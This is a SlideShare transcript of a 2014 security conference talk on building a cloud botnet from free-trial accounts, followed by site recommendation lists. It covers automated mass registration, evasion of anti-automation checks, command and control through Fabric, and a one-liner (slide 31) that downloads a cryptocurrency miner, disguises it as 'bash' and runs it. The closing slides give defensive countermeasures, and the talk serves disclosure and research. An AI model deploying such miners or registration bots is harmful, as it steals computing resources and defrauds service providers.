SlideShare a Scribd company logo

CloudBots - Harvesting Crypto Currency Like a Botnet Farmer

Rob Ragan
Rob Ragan

What happens when computer criminals start using friendly cloud services for malicious activities? In this presentation, we explore how to (ab)use free trials to get access to vast amounts of computing power, storage, and pre-made hacking environments. Oh! Also, we violate the hell out of some terms of service. We explore just how easy it is to generate massive amounts of unique email addresses; in order to register free trial accounts, deploy code, and distribute commands (C2). We managed to build this cloud-based botnet all for the low cost of $0 and semi-legally. This botnet doesn't get flagged as malware, blocked by web filters, or get taken over. This is the stuff of nightmares! While riding on the fluffy Kumobot (kumo means cloud in Japanese), it was discovered that we were not the only ones doing this! With the rise of crypto currency we now face the impending rise of botnets that mine for digital gold on someone else's systems with someone else's dime footing the electric bill. Through our efforts in building a cloud-based botnet we built enough tools to share a framework for penetration testers and security researchers. The anti-anti-automation framework will show those tasked with defense exactly what it looks like when their free trial gets assaulted.

Technology
1 of 47
Download to read offline
CloudBots: Harvesting Crypto Coins Like a Botnet Farmer 2014 August 6
2 …and Violating Terms of Service Building a Botnet with Free Cloud-based Services
3 Main Topics •  Could we build a botnet from freely available cloud services? •  Will we see the rise of more cloud based botnets? •  Should insufficient anti-automation be considered a top ten vulnerability? What are these guys talking about? Overview
4 Platform as a Service Cloud PaaS
5 Platform as a Service Free Cloud Services <Insert  with  other  providers  later>   Reference: http://goo.gl/AZ4nYp
6 Development Environment as a Service Free Cloud Services
AUTOMATION Scripting the Cloud
8 Automating Registration •  Hurdles -  Email address confirmation -  CAPTCHA -  Phone/SMS -  Credit Card Usability vs Security Cloud Providers (In)Security
9 Anti-Automation Fraudulent Account Registration More Anti-Automation Email Confirmation Only 66% 33% EMAIL CAPTCHA CREDIT CARD PHONE
10 Anti-Automation Techniques •  Email address confirmation •  CAPTCHA •  Phone/SMS •  Credit Card Usability vs Security Cloud Providers (In)Security
11
12 Automated email processing -  Wildcard localpart *@domain.com -  Extract important information from incoming emails -  Grep for confirmation token links and request them Account registration -  Automatic request sent to account activation links SMTP Services Email Confirmation Token Processing
local-part@domain.tld Email Address Anatomy
14 Using the Google AppEngine InboundMailHandler - first.last.001@cloudbotmail.appspotmail.com - first.last.002@cloudbotmail.appspotmail.com - first.last.003@cloudbotmail.appspotmail.com - first.last.004@cloudbotmail.appspotmail.com - first.last.005@cloudbotmail.appspotmail.com - first.last.006@cloudbotmail.appspotmail.com - first.last.007@cloudbotmail.appspotmail.com - first.last.008@cloudbotmail.appspotmail.com - first.last.009@cloudbotmail.appspotmail.com - first.last.010@cloudbotmail.appspotmail.com Google App Engine Detection issues
15 Unlimited usernames -  Prevent pattern recognition -  Pull from real world examples [local-part from dump]@domain.tld Realistic Randomness Real Email Addresses
16 Unlimited domains -  freedns.afraid.org -  Prevent detection -  Thousands of unique email domains SMTP Services Plethora of Email Addresses
17 Unlimited email addresses Free DNS Subdomains
18 What do we need? •  Free email relay -  Free MX registration •  Process wildcards -  *@domain.tld •  Send unlimited messages -  Unrestricted STMP to HTTP POST/ JSON requests Free Signups Receiving Email and Processing
19 Inbound Mail As A Service Free Cloud Services <Insert  with  other  providers  later>   Reference: http://goo.gl/yqoh6U
20 Automated email processing -  Extract important information from incoming emails -  Grep for confirmation token links and request them Account registration -  Automatic request sent to account activation links SMTP Services Email Confirmation Token Processing Reference: http://bishopfox.github.io/anti-anti-automation/
21 <Insert wall of random email addresses> Realistic Randomness Unique Email Addresses Avoid Pattern Recognition
DEMONSTRATION Automatic Account Creation
23 Automated Registration Workflow Email Addresses
24 MongoDB •  MongoLab •  MongoHQ Keeping track of all accounts Storing Account Information
FUNTIVITIES Botnets Are Fun!
26 What can we do? •  Distributed Network Scanning •  Distributed Password Cracking •  DDoS •  Click-fraud •  Crypto Currency Mining •  Data Storage Now we have a botnet! Fun! Botnet Activities
27 Refer Fake Friends Unlimited Storage Space
28 Refer Fake Friends Unlimited Storage Space
29 What are we using? •  Fabric -  Fabric is a Python library and command- line tool for streamlining the use of SSH for application deployment or systems administration tasks. •  fab check_hosts –P –z 20 •  fab run_command Botnet C2 Command & Control
30 Unique Amazon IP Addresses Distributed Command [na1.cloudbox.net:2352]: curl http://icanhazip.com 4.109.182.13 [eu1.cloudbox.net:3127]: curl http://icanhazip.com 126.34.56.254 [na1.cloudbox.net:10660]: curl http://icanhazip.com 58.251.42.128 [na1.cloudbox.net:15627]: curl http://icanhazip.com 74.216.236.72 [na1.cloudbox.net:8000]: curl http://icanhazip.com 28.228.253.19 [na1.cloudbox.net:4028]: curl http://icanhazip.com 64.216.37.252
31 Make money, money •  Deploying miners •  One command for $$$ All your processors are belong to us Litecoin Mining if [ ! -f bash ]; then wget http://sourceforge.net/projects/ cpuminer/files/pooler-cpuminer-2.3.2-linux-x86_64.tar.gz && tar zxfv pooler-cpuminer-2.3.2-linux-x86_64.tar.gz && rm pooler- cpuminer-2.3.2-linux-x86_64.tar.gz && mv minerd bash; fi; screen ./bash –url=stratum+tcp://pool.mine-litecoin.com -- userpass=ninja.47:47; rm bash
32 Load After Crypto Currency Mining Distributed Command ID | Host | Status ---------------------------------------- 0 | na1.cloudbox.net:1678 | 2 users, load average: 37.08, 37.60, 32.51 1 | na1.cloudbox.net:15121| 1 user, load average: 16.35, 15.35, 12.00 2 | na1.cloudbox.net:11631| 1 user, load average: 19.65, 18.46, 14.38 3 | na1.cloudbox.net:4358 | 2 users, load average: 23.10, 22.91, 18.95 4 | na1.cloudbox.net:1212 | 1 user, load average: 19.60, 18.47, 14.41 5 | na1.cloudbox.net:5841 | 1 user, load average: 19.97, 18.61, 14.52 6 | eu1.cloudbox.net:3025 | 1 user, load average: 19.27, 18.37, 14.33 7 | eu1.cloudbox.net:6892 | 2 users, load average: 19.65, 18.46, 14.38 8 | eu1.cloudbox.net:2038 | 1 user, load average: 18.85, 17.43, 13.45 9 | na1.cloudbox.net:5235 | 1 user, load average: 18.55, 17.32, 13.38 10 | na1.cloudbox.net:1122 | 1 user, load average: 26.04, 25.57, 20.02
33 All your processors are belong to us Litecoin Mining
CLOUD BREAKOUT Bypassing Restrictions
DETECTION No one can catch a ninja!
36 Automatic Backups •  Propagate to other similar services -  e.g. MongoLab ß à MongoHQ •  Infrastructure across multiple service providers •  Easily migrated Armadillo Up ™ Disaster Recovery Plan
RISING TREAD Active Attacks
38 Adaptation Cloud Provider Registration
39 Adaptation Cloud Provider Registration
40 Adaptation Cloud Provider Registration
41 Crypto Coins & DDoS Clouds Under Siege
42 Crypto Coins & DDoS Clouds Under Siege
PROTECTION Bot Busters
44 What can we do? •  Logic puzzles •  Sound output •  Credit card validation •  Live operators •  Limited-use account •  Heuristic checks •  Federated identity systems Usability vs Security Protection Reference: http://www.w3.org/TR/2003/WD-turingtest-20031105/#solutions
45 What should we do? •  Analyzing properties of Sybil accounts •  Analyzing the arrival rate and distribution of accounts •  Flag accounts registered with emails from newly registered domain names •  Email verification •  CAPTCHAs •  IP Blacklisting •  Phone/SMS verification •  Automatic pattern recognition At Abuse vs At Registration Protection Reference: https://www.usenix.org/system/files/conference/usenixsecurity13/sec13-paper_thomas.pdf
46 At Abuse vs At Registration Protection Advanced techniques •  Signup flow events -  Detect common activities after signup •  User-agent -  A registration bot may generate a different user-agent for each signup or use uncommon user-agents •  Form submission timing -  A bot that doesn't mimic human behavior by performing certain actions too quickly can be detected Reference: https://www.usenix.org/system/files/conference/usenixsecurity13/sec13-paper_thomas.pdf
THANK YOU Oscar Salazar @tracertea Rob Ragan @sweepthatleg CONTACT@BISHOPFOX.COM

Recommended

CPUの同時実行機能
CPUの同時実行機能CPUの同時実行機能
CPUの同時実行機能Shinichiro Niiyama
 
Dependency injection - the right way
Dependency injection - the right wayDependency injection - the right way
Dependency injection - the right wayThibaud Desodt
 
Easy Microservices with JHipster - Devoxx BE 2017
Easy Microservices with JHipster - Devoxx BE 2017Easy Microservices with JHipster - Devoxx BE 2017
Easy Microservices with JHipster - Devoxx BE 2017Deepu K Sasidharan
 
Docker란 무엇인가? : Docker 기본 사용법
Docker란 무엇인가? : Docker 기본 사용법Docker란 무엇인가? : Docker 기본 사용법
Docker란 무엇인가? : Docker 기본 사용법pyrasis
 
Springboot Microservices
Springboot MicroservicesSpringboot Microservices
Springboot MicroservicesNexThoughts Technologies
 
Nest.js Introduction
Nest.js IntroductionNest.js Introduction
Nest.js IntroductionTakuya Tejima
 
Hyperledger Fabric 概説
Hyperledger Fabric 概説Hyperledger Fabric 概説
Hyperledger Fabric 概説Hyperleger Tokyo Meetup
 
Apache Maven 3
Apache Maven 3Apache Maven 3
Apache Maven 3Maxime Gréau
 

Recommended

CPUの同時実行機能
CPUの同時実行機能CPUの同時実行機能
CPUの同時実行機能Shinichiro Niiyama
 
Dependency injection - the right way
Dependency injection - the right wayDependency injection - the right way
Dependency injection - the right wayThibaud Desodt
 
Easy Microservices with JHipster - Devoxx BE 2017
Easy Microservices with JHipster - Devoxx BE 2017Easy Microservices with JHipster - Devoxx BE 2017
Easy Microservices with JHipster - Devoxx BE 2017Deepu K Sasidharan
 
Docker란 무엇인가? : Docker 기본 사용법
Docker란 무엇인가? : Docker 기본 사용법Docker란 무엇인가? : Docker 기본 사용법
Docker란 무엇인가? : Docker 기본 사용법pyrasis
 
Springboot Microservices
Springboot MicroservicesSpringboot Microservices
Springboot MicroservicesNexThoughts Technologies
 
Nest.js Introduction
Nest.js IntroductionNest.js Introduction
Nest.js IntroductionTakuya Tejima
 
Hyperledger Fabric 概説
Hyperledger Fabric 概説Hyperledger Fabric 概説
Hyperledger Fabric 概説Hyperleger Tokyo Meetup
 
Apache Maven 3
Apache Maven 3Apache Maven 3
Apache Maven 3Maxime Gréau
 
Apache tomcat
Apache tomcatApache tomcat
Apache tomcatShashwat Shriparv
 
tcpdumpとtcpreplayとtcprewriteと他。
tcpdumpとtcpreplayとtcprewriteと他。tcpdumpとtcpreplayとtcprewriteと他。
tcpdumpとtcpreplayとtcprewriteと他。(^-^) togakushi
 
Java EE no ambiente corporativo: primeiros passos WebLogic 12c
Java EE no ambiente corporativo: primeiros passos WebLogic 12cJava EE no ambiente corporativo: primeiros passos WebLogic 12c
Java EE no ambiente corporativo: primeiros passos WebLogic 12cBruno Borges
 
Getting started with Spring Security
Getting started with Spring SecurityGetting started with Spring Security
Getting started with Spring SecurityKnoldus Inc.
 
NestJS
NestJSNestJS
NestJSWilson Su
 
今なら間に合う分散型IDとEntra Verified ID
今なら間に合う分散型IDとEntra Verified ID今なら間に合う分散型IDとEntra Verified ID
今なら間に合う分散型IDとEntra Verified IDNaohiro Fujie
 
Hyperledger Fabric 簡単構築ツール minifabricのご紹介 〜productionへの移行をminifabricで加速〜
Hyperledger Fabric 簡単構築ツール minifabricのご紹介 〜productionへの移行をminifabricで加速〜Hyperledger Fabric 簡単構築ツール minifabricのご紹介 〜productionへの移行をminifabricで加速〜
Hyperledger Fabric 簡単構築ツール minifabricのご紹介 〜productionへの移行をminifabricで加速〜Hyperleger Tokyo Meetup
 
Win10Pcap を使って見る
Win10Pcap を使って見るWin10Pcap を使って見る
Win10Pcap を使って見る彰 村地
 
Docker 사내교육 자료
Docker 사내교육 자료Docker 사내교육 자료
Docker 사내교육 자료Juneyoung Oh
 
Cloud stack troubleshooting
Cloud stack troubleshooting Cloud stack troubleshooting
Cloud stack troubleshooting AlexTian
 
Linux Container Technology 101
Linux Container Technology 101Linux Container Technology 101
Linux Container Technology 101inside-BigData.com
 
フォレンジックツールの開発と実装
フォレンジックツールの開発と実装フォレンジックツールの開発と実装
フォレンジックツールの開発と実装IIJ
 
virtio勉強会 #1 「virtioの基本的なところ(DRAFT版)」
virtio勉強会 #1 「virtioの基本的なところ(DRAFT版)」virtio勉強会 #1 「virtioの基本的なところ(DRAFT版)」
virtio勉強会 #1 「virtioの基本的なところ(DRAFT版)」Naoya Kaneko
 
자바 웹 개발 시작하기 (10주차 : ㅌㅗㅇ ㅎㅏ ㄹㅏ)

자바 웹 개발 시작하기 (10주차 : ㅌㅗㅇ ㅎㅏ ㄹㅏ)
자바 웹 개발 시작하기 (10주차 : ㅌㅗㅇ ㅎㅏ ㄹㅏ)

자바 웹 개발 시작하기 (10주차 : ㅌㅗㅇ ㅎㅏ ㄹㅏ)
DK Lee
 
【Interop Tokyo 2022】ここが見どころ!ジュニパーのShowNetにおける取組みご紹介
【Interop Tokyo 2022】ここが見どころ!ジュニパーのShowNetにおける取組みご紹介【Interop Tokyo 2022】ここが見どころ!ジュニパーのShowNetにおける取組みご紹介
【Interop Tokyo 2022】ここが見どころ!ジュニパーのShowNetにおける取組みご紹介Juniper Networks (日本)
 
Spring Security
Spring SecuritySpring Security
Spring SecurityBoy Tech
 
Spring Security
Spring SecuritySpring Security
Spring SecuritySumit Gole
 
Devoxx 2023 - Sécurisez votre software supply chain avec SLSA, Sigstore et K...
Devoxx 2023 - Sécurisez votre software supply chain avec SLSA, Sigstore et K...Devoxx 2023 - Sécurisez votre software supply chain avec SLSA, Sigstore et K...
Devoxx 2023 - Sécurisez votre software supply chain avec SLSA, Sigstore et K...Mohamed Abdennebi
 
IoT×Blockchain活用事例 ~トイレに学ぶHyperledger Fabricシステム開発の勘所~
IoT×Blockchain活用事例 ~トイレに学ぶHyperledger Fabricシステム開発の勘所~IoT×Blockchain活用事例 ~トイレに学ぶHyperledger Fabricシステム開発の勘所~
IoT×Blockchain活用事例 ~トイレに学ぶHyperledger Fabricシステム開発の勘所~Hyperleger Tokyo Meetup
 
Brocade SAN 製品概要
Brocade SAN 製品概要Brocade SAN 製品概要
Brocade SAN 製品概要Brocade
 
Attack Chaining: Advanced Maneuvers for Hack Fu
Attack Chaining: Advanced Maneuvers for Hack FuAttack Chaining: Advanced Maneuvers for Hack Fu
Attack Chaining: Advanced Maneuvers for Hack FuRob Ragan
 
Social Engineering: the Bad, Better, and Best Incident Response Plans
Social Engineering: the Bad, Better, and Best Incident Response PlansSocial Engineering: the Bad, Better, and Best Incident Response Plans
Social Engineering: the Bad, Better, and Best Incident Response PlansRob Ragan
 

More Related Content

What's hot

tcpdumpとtcpreplayとtcprewriteと他。
tcpdumpとtcpreplayとtcprewriteと他。tcpdumpとtcpreplayとtcprewriteと他。
tcpdumpとtcpreplayとtcprewriteと他。(^-^) togakushi
 
Java EE no ambiente corporativo: primeiros passos WebLogic 12c
Java EE no ambiente corporativo: primeiros passos WebLogic 12cJava EE no ambiente corporativo: primeiros passos WebLogic 12c
Java EE no ambiente corporativo: primeiros passos WebLogic 12cBruno Borges
 
Getting started with Spring Security
Getting started with Spring SecurityGetting started with Spring Security
Getting started with Spring SecurityKnoldus Inc.
 
今なら間に合う分散型IDとEntra Verified ID
今なら間に合う分散型IDとEntra Verified ID今なら間に合う分散型IDとEntra Verified ID
今なら間に合う分散型IDとEntra Verified IDNaohiro Fujie
 
Hyperledger Fabric 簡単構築ツール minifabricのご紹介 〜productionへの移行をminifabricで加速〜
Hyperledger Fabric 簡単構築ツール minifabricのご紹介 〜productionへの移行をminifabricで加速〜Hyperledger Fabric 簡単構築ツール minifabricのご紹介 〜productionへの移行をminifabricで加速〜
Hyperledger Fabric 簡単構築ツール minifabricのご紹介 〜productionへの移行をminifabricで加速〜Hyperleger Tokyo Meetup
 
Win10Pcap を使って見る
Win10Pcap を使って見るWin10Pcap を使って見る
Win10Pcap を使って見る彰 村地
 
Docker 사내교육 자료
Docker 사내교육 자료Docker 사내교육 자료
Docker 사내교육 자료Juneyoung Oh
 
Cloud stack troubleshooting
Cloud stack troubleshooting Cloud stack troubleshooting
Cloud stack troubleshooting AlexTian
 
Linux Container Technology 101
Linux Container Technology 101Linux Container Technology 101
Linux Container Technology 101inside-BigData.com
 
フォレンジックツールの開発と実装
フォレンジックツールの開発と実装フォレンジックツールの開発と実装
フォレンジックツールの開発と実装IIJ
 
virtio勉強会 #1 「virtioの基本的なところ(DRAFT版)」
virtio勉強会 #1 「virtioの基本的なところ(DRAFT版)」virtio勉強会 #1 「virtioの基本的なところ(DRAFT版)」
virtio勉強会 #1 「virtioの基本的なところ(DRAFT版)」Naoya Kaneko
 
자바 웹 개발 시작하기 (10주차 : ㅌㅗㅇ ㅎㅏ ㄹㅏ)

자바 웹 개발 시작하기 (10주차 : ㅌㅗㅇ ㅎㅏ ㄹㅏ)
자바 웹 개발 시작하기 (10주차 : ㅌㅗㅇ ㅎㅏ ㄹㅏ)

자바 웹 개발 시작하기 (10주차 : ㅌㅗㅇ ㅎㅏ ㄹㅏ)
DK Lee
 
【Interop Tokyo 2022】ここが見どころ!ジュニパーのShowNetにおける取組みご紹介
【Interop Tokyo 2022】ここが見どころ!ジュニパーのShowNetにおける取組みご紹介【Interop Tokyo 2022】ここが見どころ!ジュニパーのShowNetにおける取組みご紹介
【Interop Tokyo 2022】ここが見どころ!ジュニパーのShowNetにおける取組みご紹介Juniper Networks (日本)
 
Spring Security
Spring SecuritySpring Security
Spring SecurityBoy Tech
 
Spring Security
Spring SecuritySpring Security
Spring SecuritySumit Gole
 
Devoxx 2023 - Sécurisez votre software supply chain avec SLSA, Sigstore et K...
Devoxx 2023 - Sécurisez votre software supply chain avec SLSA, Sigstore et K...Devoxx 2023 - Sécurisez votre software supply chain avec SLSA, Sigstore et K...
Devoxx 2023 - Sécurisez votre software supply chain avec SLSA, Sigstore et K...Mohamed Abdennebi
 
IoT×Blockchain活用事例 ~トイレに学ぶHyperledger Fabricシステム開発の勘所~
IoT×Blockchain活用事例 ~トイレに学ぶHyperledger Fabricシステム開発の勘所~IoT×Blockchain活用事例 ~トイレに学ぶHyperledger Fabricシステム開発の勘所~
IoT×Blockchain活用事例 ~トイレに学ぶHyperledger Fabricシステム開発の勘所~Hyperleger Tokyo Meetup
 
Brocade SAN 製品概要
Brocade SAN 製品概要Brocade SAN 製品概要
Brocade SAN 製品概要Brocade
 

What's hot (20)

Apache tomcat
Apache tomcatApache tomcat
Apache tomcat
 
tcpdumpとtcpreplayとtcprewriteと他。
tcpdumpとtcpreplayとtcprewriteと他。tcpdumpとtcpreplayとtcprewriteと他。
tcpdumpとtcpreplayとtcprewriteと他。
 
Java EE no ambiente corporativo: primeiros passos WebLogic 12c
Java EE no ambiente corporativo: primeiros passos WebLogic 12cJava EE no ambiente corporativo: primeiros passos WebLogic 12c
Java EE no ambiente corporativo: primeiros passos WebLogic 12c
 
Getting started with Spring Security
Getting started with Spring SecurityGetting started with Spring Security
Getting started with Spring Security
 
NestJS
NestJSNestJS
NestJS
 
今なら間に合う分散型IDとEntra Verified ID
今なら間に合う分散型IDとEntra Verified ID今なら間に合う分散型IDとEntra Verified ID
今なら間に合う分散型IDとEntra Verified ID
 
Hyperledger Fabric 簡単構築ツール minifabricのご紹介 〜productionへの移行をminifabricで加速〜
Hyperledger Fabric 簡単構築ツール minifabricのご紹介 〜productionへの移行をminifabricで加速〜Hyperledger Fabric 簡単構築ツール minifabricのご紹介 〜productionへの移行をminifabricで加速〜
Hyperledger Fabric 簡単構築ツール minifabricのご紹介 〜productionへの移行をminifabricで加速〜
 
Win10Pcap を使って見る
Win10Pcap を使って見るWin10Pcap を使って見る
Win10Pcap を使って見る
 
Docker 사내교육 자료
Docker 사내교육 자료Docker 사내교육 자료
Docker 사내교육 자료
 
Cloud stack troubleshooting
Cloud stack troubleshooting Cloud stack troubleshooting
Cloud stack troubleshooting
 
Linux Container Technology 101
Linux Container Technology 101Linux Container Technology 101
Linux Container Technology 101
 
フォレンジックツールの開発と実装
フォレンジックツールの開発と実装フォレンジックツールの開発と実装
フォレンジックツールの開発と実装
 
virtio勉強会 #1 「virtioの基本的なところ(DRAFT版)」
virtio勉強会 #1 「virtioの基本的なところ(DRAFT版)」virtio勉強会 #1 「virtioの基本的なところ(DRAFT版)」
virtio勉強会 #1 「virtioの基本的なところ(DRAFT版)」
 
자바 웹 개발 시작하기 (10주차 : ㅌㅗㅇ ㅎㅏ ㄹㅏ)

자바 웹 개발 시작하기 (10주차 : ㅌㅗㅇ ㅎㅏ ㄹㅏ)
자바 웹 개발 시작하기 (10주차 : ㅌㅗㅇ ㅎㅏ ㄹㅏ)

자바 웹 개발 시작하기 (10주차 : ㅌㅗㅇ ㅎㅏ ㄹㅏ)

 
【Interop Tokyo 2022】ここが見どころ!ジュニパーのShowNetにおける取組みご紹介
【Interop Tokyo 2022】ここが見どころ!ジュニパーのShowNetにおける取組みご紹介【Interop Tokyo 2022】ここが見どころ!ジュニパーのShowNetにおける取組みご紹介
【Interop Tokyo 2022】ここが見どころ!ジュニパーのShowNetにおける取組みご紹介
 
Spring Security
Spring SecuritySpring Security
Spring Security
 
Spring Security
Spring SecuritySpring Security
Spring Security
 
Devoxx 2023 - Sécurisez votre software supply chain avec SLSA, Sigstore et K...
Devoxx 2023 - Sécurisez votre software supply chain avec SLSA, Sigstore et K...Devoxx 2023 - Sécurisez votre software supply chain avec SLSA, Sigstore et K...
Devoxx 2023 - Sécurisez votre software supply chain avec SLSA, Sigstore et K...
 
IoT×Blockchain活用事例 ~トイレに学ぶHyperledger Fabricシステム開発の勘所~
IoT×Blockchain活用事例 ~トイレに学ぶHyperledger Fabricシステム開発の勘所~IoT×Blockchain活用事例 ~トイレに学ぶHyperledger Fabricシステム開発の勘所~
IoT×Blockchain活用事例 ~トイレに学ぶHyperledger Fabricシステム開発の勘所~
 
Brocade SAN 製品概要
Brocade SAN 製品概要Brocade SAN 製品概要
Brocade SAN 製品概要
 

Viewers also liked

Attack Chaining: Advanced Maneuvers for Hack Fu
Attack Chaining: Advanced Maneuvers for Hack FuAttack Chaining: Advanced Maneuvers for Hack Fu
Attack Chaining: Advanced Maneuvers for Hack FuRob Ragan
 
Social Engineering: the Bad, Better, and Best Incident Response Plans
Social Engineering: the Bad, Better, and Best Incident Response PlansSocial Engineering: the Bad, Better, and Best Incident Response Plans
Social Engineering: the Bad, Better, and Best Incident Response PlansRob Ragan
 
Tenacious Diggity - Skinny Dippin in a Sea of Bing
Tenacious Diggity - Skinny Dippin in a Sea of BingTenacious Diggity - Skinny Dippin in a Sea of Bing
Tenacious Diggity - Skinny Dippin in a Sea of BingRob Ragan
 
Black Hat 2011 - Pulp Google Hacking: The Next Generation Search Engine Hacki...
Black Hat 2011 - Pulp Google Hacking: The Next Generation Search Engine Hacki...Black Hat 2011 - Pulp Google Hacking: The Next Generation Search Engine Hacki...
Black Hat 2011 - Pulp Google Hacking: The Next Generation Search Engine Hacki...Rob Ragan
 
Bitcoin 101: The Currency, The Network, The Community
Bitcoin 101: The Currency, The Network, The CommunityBitcoin 101: The Currency, The Network, The Community
Bitcoin 101: The Currency, The Network, The CommunityEarthsite
 
Blockchains 101 - Muneeb Ali, Blockstack Labs
Blockchains 101 - Muneeb Ali, Blockstack LabsBlockchains 101 - Muneeb Ali, Blockstack Labs
Blockchains 101 - Muneeb Ali, Blockstack LabsWithTheBest
 
Demonetisation
DemonetisationDemonetisation
DemonetisationKannan R
 
Intro to Web Application Security
Intro to Web Application SecurityIntro to Web Application Security
Intro to Web Application SecurityRob Ragan
 
BSidesPGH - Never Surrender - Reducing Social Engineering Risk
BSidesPGH - Never Surrender - Reducing Social Engineering RiskBSidesPGH - Never Surrender - Reducing Social Engineering Risk
BSidesPGH - Never Surrender - Reducing Social Engineering RiskRob Ragan
 
21 Hidden LinkedIn Hacks Revealed
21 Hidden LinkedIn Hacks Revealed21 Hidden LinkedIn Hacks Revealed
21 Hidden LinkedIn Hacks RevealedEmma Brudner
 
Train The Trainer Power Point Presentation
Train The Trainer Power Point PresentationTrain The Trainer Power Point Presentation
Train The Trainer Power Point Presentationpreethi_madhan
 

Viewers also liked (15)

Attack Chaining: Advanced Maneuvers for Hack Fu
Attack Chaining: Advanced Maneuvers for Hack FuAttack Chaining: Advanced Maneuvers for Hack Fu
Attack Chaining: Advanced Maneuvers for Hack Fu
 
Social Engineering: the Bad, Better, and Best Incident Response Plans
Social Engineering: the Bad, Better, and Best Incident Response PlansSocial Engineering: the Bad, Better, and Best Incident Response Plans
Social Engineering: the Bad, Better, and Best Incident Response Plans
 
Tenacious Diggity - Skinny Dippin in a Sea of Bing
Tenacious Diggity - Skinny Dippin in a Sea of BingTenacious Diggity - Skinny Dippin in a Sea of Bing
Tenacious Diggity - Skinny Dippin in a Sea of Bing
 
Black money
Black moneyBlack money
Black money
 
Black Hat 2011 - Pulp Google Hacking: The Next Generation Search Engine Hacki...
Black Hat 2011 - Pulp Google Hacking: The Next Generation Search Engine Hacki...Black Hat 2011 - Pulp Google Hacking: The Next Generation Search Engine Hacki...
Black Hat 2011 - Pulp Google Hacking: The Next Generation Search Engine Hacki...
 
Bitcoin 101: The Currency, The Network, The Community
Bitcoin 101: The Currency, The Network, The CommunityBitcoin 101: The Currency, The Network, The Community
Bitcoin 101: The Currency, The Network, The Community
 
Blockchains 101 - Muneeb Ali, Blockstack Labs
Blockchains 101 - Muneeb Ali, Blockstack LabsBlockchains 101 - Muneeb Ali, Blockstack Labs
Blockchains 101 - Muneeb Ali, Blockstack Labs
 
Demonetisation
DemonetisationDemonetisation
Demonetisation
 
Intro to Web Application Security
Intro to Web Application SecurityIntro to Web Application Security
Intro to Web Application Security
 
Demonetization Myths Debunked
Demonetization Myths DebunkedDemonetization Myths Debunked
Demonetization Myths Debunked
 
BSidesPGH - Never Surrender - Reducing Social Engineering Risk
BSidesPGH - Never Surrender - Reducing Social Engineering RiskBSidesPGH - Never Surrender - Reducing Social Engineering Risk
BSidesPGH - Never Surrender - Reducing Social Engineering Risk
 
Corruption
CorruptionCorruption
Corruption
 
Demonetisation.
Demonetisation.Demonetisation.
Demonetisation.
 
21 Hidden LinkedIn Hacks Revealed
21 Hidden LinkedIn Hacks Revealed21 Hidden LinkedIn Hacks Revealed
21 Hidden LinkedIn Hacks Revealed
 
Train The Trainer Power Point Presentation
Train The Trainer Power Point PresentationTrain The Trainer Power Point Presentation
Train The Trainer Power Point Presentation
 

Similar to CloudBots - Harvesting Crypto Currency Like a Botnet Farmer

Black Hat USA - CloudBots Harvesting Crypto Coins Like a Botnet Farmer
Black Hat USA - CloudBots Harvesting Crypto Coins Like a Botnet FarmerBlack Hat USA - CloudBots Harvesting Crypto Coins Like a Botnet Farmer
Black Hat USA - CloudBots Harvesting Crypto Coins Like a Botnet FarmerBishop Fox
 
How to build corporate size fraud prevention
How to build corporate size fraud preventionHow to build corporate size fraud prevention
How to build corporate size fraud preventionRakuten Group, Inc.
 
VPCs, Metrics Framework, Back pressure : MuleSoft Virtual Muleys Meetups
VPCs, Metrics Framework, Back pressure : MuleSoft Virtual Muleys MeetupsVPCs, Metrics Framework, Back pressure : MuleSoft Virtual Muleys Meetups
VPCs, Metrics Framework, Back pressure : MuleSoft Virtual Muleys MeetupsAngel Alberici
 
Beyond S3 Buckets - Effective Countermeasures for Emerging Cloud Threats
Beyond S3 Buckets - Effective Countermeasures for Emerging Cloud ThreatsBeyond S3 Buckets - Effective Countermeasures for Emerging Cloud Threats
Beyond S3 Buckets - Effective Countermeasures for Emerging Cloud ThreatsSBWebinars
 
Meetup milano #3 all you need to know before creating your vpc
Meetup milano #3 all you need to know before creating your vpcMeetup milano #3 all you need to know before creating your vpc
Meetup milano #3 all you need to know before creating your vpcGonzalo Marcos Ansoain
 
Boundless Digital - Boost IT Network Capabilities thanks to Cisco APIs
Boundless Digital - Boost IT Network Capabilities thanks to Cisco APIsBoundless Digital - Boost IT Network Capabilities thanks to Cisco APIs
Boundless Digital - Boost IT Network Capabilities thanks to Cisco APIsSidney Burks, Ph.D
 
[Call for code] IBM 블록체인을 활용하여 투명하게 구호기금 관리하기 - Hyperledger Fabric v1.1 by 맹개발
[Call for code] IBM 블록체인을 활용하여 투명하게 구호기금 관리하기 - Hyperledger Fabric v1.1 by 맹개발 [Call for code] IBM 블록체인을 활용하여 투명하게 구호기금 관리하기 - Hyperledger Fabric v1.1 by 맹개발
[Call for code] IBM 블록체인을 활용하여 투명하게 구호기금 관리하기 - Hyperledger Fabric v1.1 by 맹개발 Yunho Maeng
 
Achieving scalability & speed with IaaS
Achieving scalability & speed with IaaSAchieving scalability & speed with IaaS
Achieving scalability & speed with IaaSIBM Software India
 
Getting started with bc 2.0 in the cloud
Getting started with bc 2.0 in the cloud Getting started with bc 2.0 in the cloud
Getting started with bc 2.0 in the cloudLennartF
 
How to build corporate size fraud prevention
How to build corporate size fraud preventionHow to build corporate size fraud prevention
How to build corporate size fraud preventionYury Leonychev
 
IoT with the Best: Watson IoT Bluemix and Blockchain
IoT with the Best: Watson IoT Bluemix and BlockchainIoT with the Best: Watson IoT Bluemix and Blockchain
IoT with the Best: Watson IoT Bluemix and BlockchainValerie Lampkin
 
IBM's Watson IoT Platform Allows You to Quickly Connect Devices to Bluemix Cl...
IBM's Watson IoT Platform Allows You to Quickly Connect Devices to Bluemix Cl...IBM's Watson IoT Platform Allows You to Quickly Connect Devices to Bluemix Cl...
IBM's Watson IoT Platform Allows You to Quickly Connect Devices to Bluemix Cl...WithTheBest
 
From Zero to Serverless
From Zero to ServerlessFrom Zero to Serverless
From Zero to ServerlessChad Green
 
IBM API Connect Deployment `Good Practices - IBM Think 2018
IBM API Connect Deployment `Good Practices - IBM Think 2018IBM API Connect Deployment `Good Practices - IBM Think 2018
IBM API Connect Deployment `Good Practices - IBM Think 2018Chris Phillips
 
Will Microservices Die.pdf
Will Microservices Die.pdfWill Microservices Die.pdf
Will Microservices Die.pdfRichHagarty
 
Hyperledger Fabric - Blockchain for the Enterprise - FOSDEM 20190203
Hyperledger Fabric - Blockchain for the Enterprise - FOSDEM 20190203Hyperledger Fabric - Blockchain for the Enterprise - FOSDEM 20190203
Hyperledger Fabric - Blockchain for the Enterprise - FOSDEM 20190203Arnaud Le Hors
 
Cloud Computing v.s. Cyber Security
